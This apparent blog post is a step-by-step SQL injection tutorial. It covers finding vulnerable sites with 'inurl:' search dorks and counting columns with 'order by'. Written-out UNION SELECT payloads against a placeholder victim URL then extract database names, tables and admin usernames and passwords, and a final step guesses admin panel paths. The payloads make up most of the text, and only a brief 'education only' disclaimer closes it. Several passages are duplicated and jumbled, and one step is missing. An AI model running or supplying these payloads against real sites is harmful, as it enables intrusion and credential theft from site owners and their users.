we have seen many vulnerabilities in different areas, In this post , i am going to explain about a new vulnerability of sql database(web). Many of us familiar with web development , They(developers) are concentrate on interface design rather than concentrate on Database design in a secure way, So because of this lot of sites in internet become vulnerable ,of course it was good entertainment for HACKERS (who enjoying the flaws)
well let me introduce the vulnerability of sql---"SQL injection"
what is sql injection ?
SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from an application form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
in simple words we can say that SQL injection is a technique often used to attack data driven applications(not just a web application for all type applications which maintains database )
what the hackers can do with this?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
ATTACK STYLE
step-1:
if we having specific target to attack,then you do not need to follow this step, If it is the case of no target than you should find the website which driven the database
it is very easy to find a database driven website, using an advanced keyword in search
(the keyword is "inurl", with this keyword you can find the results in prespective of URL's only)
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
so attacker can find a lot of sites in search results , than attacker choose one target .
Step 2:
Checking the Vulnerability:
Now let us see , how hacker checks the vulnerability of the target website. To check the vulnerability ,
add the single quotes(') at the end of the url and hit enter.
For eg:
http://www.victim.com/index.php?id=2' If it got an error message just like this, then it means that the site is vulnerable
you have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
Hacker found place (url) which is said to be the website is vulnerable to SQLi attack. The next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,5,6,...n.
this will done by hacker Until he get the error like "unknown column ".
For eg:
If the hacker get the error while trying the "x"th number,then no of column is "x-1".
I mean:
In case ,if the above method fails to work , then hacker will try to add the "--" at the end of the statement.
For eg:
Now the hacker successfully discovered the number of columns present in the target database. the next step is to find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative(i mean id=-2). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:
if the number of columns is 7 ,then the query is as follow:
Hacker found place (url) which is said to be the website is vulnerable to SQLi attack. The next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,5,6,...n.
this will done by hacker Until he get the error like "unknown column ".
For eg:
http://www.victimsite.com/index.php?id=2 order by 1http://www.victimsite.com/index.php?id=2 order by 2http://www.victimsite.com/index.php?id=2 order by 3http://www.victimsite.com/index.php?id=2 order by 4
If the hacker get the error while trying the "x"th number,then no of column is "x-1".
I mean:
so now x=8 , The number of column is x-1 i.e, 7.http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
In case ,if the above method fails to work , then hacker will try to add the "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1-- Now the hacker successfully discovered the number of columns present in the target database. the next step is to find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative(i mean id=-2). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Bingo, column '3' and '7' are found to be vulnerable. hacker will take the first vulnerable column '3' .He can inject our query in this column.
Step 5: Finding version,database,user
Replace the 3 from the query with "version()"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7-- again replace the version() with database() and user() for finding the database,user respectively.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7-- http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7-- If the above is not working,then hacker will try the following:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).
Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For eg:
Now it will display the list of table names. Find the table name which is related with the admin or user.
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Let us choose the "admin " table.
Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
We have to convert the table name to MySql CHAR() string .
Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.
Select sql->Mysql->MysqlChar() in the Hackbar.
It will ask you to enter string that you want to convert to MySQLCHAR(). We want to convert the table name to MySQLChar . In our case the table name is 'admin'.
Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--The above query will display the list of column.
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin-- If we got luck, then it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.
Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/ If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.
note:(warning)
The articles in this blog are completely for education purpose only, In any manner this author /blog do not intent to encourage to do hacking over the network,In case any sense the issues caused by you, the author responsible for your work ,its your own risk please have a kind sense and be ETHICAL
